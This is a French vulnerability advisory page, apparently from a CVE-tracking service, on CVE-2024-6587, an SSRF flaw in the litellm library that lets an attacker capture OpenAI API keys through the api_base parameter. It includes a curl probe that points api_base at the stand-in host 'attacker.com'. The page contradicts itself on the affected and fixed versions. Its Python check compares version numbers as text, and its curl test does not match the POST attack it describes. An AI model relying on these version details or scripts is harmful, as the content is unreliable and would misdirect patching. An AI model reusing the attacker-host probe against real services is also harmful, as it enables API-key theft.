Plateforme
python
Composant
litellm
Corrigé dans
1.44.9
1.44.8
Une vulnérabilité de type Server-Side Request Forgery (SSRF) a été découverte dans la bibliothèque litellm, affectant les versions inférieures ou égales à 1.9.dev0. Cette faille permet à un attaquant de manipuler les requêtes envoyées par l'application, potentiellement exposant des informations sensibles. La mise à jour vers la version 1.44.8 corrige cette vulnérabilité et est fortement recommandée.
L'exploitation réussie de cette vulnérabilité SSRF permet à un attaquant de spécifier le paramètre api_base dans les requêtes POST /chat/completions. En dirigeant cette requête vers un domaine contrôlé par l'attaquant, il peut intercepter la clé API OpenAI utilisée par litellm. Cette clé API, si compromise, peut être utilisée pour accéder et exploiter les services OpenAI de manière non autorisée, entraînant des coûts financiers, une fuite de données sensibles ou une atteinte à la réputation. Le risque est amplifié si litellm est utilisé dans des environnements de production avec des données sensibles ou des intégrations critiques.
Cette vulnérabilité a été rendue publique le 13 septembre 2024. Il n'y a pas d'indications d'une exploitation active à grande échelle à ce jour. La probabilité d'exploitation est considérée comme moyenne, compte tenu de la simplicité de l'exploitation et de la popularité de litellm. Aucun PoC public n'a été largement diffusé, mais la nature de la vulnérabilité SSRF rend son exploitation relativement simple.
Applications utilizing the berriai/litellm library, particularly those integrated with OpenAI services, are at risk. Environments where the api_base parameter is not properly validated or sanitized are especially vulnerable. Shared hosting environments where multiple users might interact with the litellm application are also at increased risk.
• python / library:
import os
import subprocess
def check_litellm_version():
try:
result = subprocess.check_output(['pip', 'show', 'litellm'], stderr=subprocess.STDOUT, text=True)
version_line = [line for line in result.splitlines() if 'Version:' in line]
if version_line:
version = version_line[0].split(': ')[1].strip()
if version <= '1.9.dev0':
print(f"[!] litellm version {version} is vulnerable to CVE-2024-6587. Upgrade to 1.44.8 or later.")
else:
print("[+] litellm version is not vulnerable.")
else:
print("[!] Could not determine litellm version.")
except FileNotFoundError:
print("[!] litellm is not installed.")
check_litellm_version()• generic web:
curl -I 'http://your-litellm-app/chat/completions?api_base=http://attacker.com' | grep api_basedisclosure
patch
Statut de l'Exploit
EPSS
88.37% (percentile 99%)
CISA SSVC
Vecteur CVSS
La mitigation principale consiste à mettre à jour litellm vers la version 1.44.8 ou supérieure, qui corrige cette vulnérabilité. Si la mise à jour n'est pas immédiatement possible, une solution temporaire consiste à restreindre l'accès au paramètre apibase via une validation stricte des entrées utilisateur. Implémentez des règles de pare-feu d'application web (WAF) pour bloquer les requêtes suspectes contenant des domaines non autorisés dans le paramètre apibase. Surveillez les journaux d'accès pour détecter les tentatives d'exploitation de la vulnérabilité, en recherchant des requêtes vers des domaines inconnus ou suspects. Après la mise à jour, vérifiez la configuration de litellm pour vous assurer que le paramètre api_base est correctement validé et sécurisé.
Mettez à jour la bibliothèque litellm à la version 1.44.9 ou supérieure. Cela corrige la vulnérabilité SSRF qui permet à des utilisateurs malveillants d'intercepter la clé API OpenAI. Exécutez `pip install --upgrade litellm` pour mettre à jour vers la dernière version.
Analyses de vulnérabilités et alertes critiques directement dans votre boîte mail.
CVE-2024-6587 est une vulnérabilité SSRF (Server-Side Request Forgery) dans la bibliothèque litellm, permettant à un attaquant d'intercepter la clé API OpenAI.
Vous êtes affecté si vous utilisez litellm version 1.38.10 ou une version antérieure à 1.44.8.
Mettez à jour litellm vers la version 1.44.8 ou supérieure. En attendant, restreignez l'accès au paramètre api_base.
Il n'y a pas d'indications d'une exploitation active à grande échelle à ce jour, mais la vulnérabilité est potentiellement exploitable.
Consultez le dépôt GitHub de litellm pour les informations officielles et les notes de version : [https://github.com/berriai/litellm](https://github.com/berriai/litellm)
Téléverse ton fichier de dépendances et découvre instantanément si cette CVE et d'autres te touchent.
Téléverse ton fichier requirements.txt et nous te dirons instantanément si tu es affecté.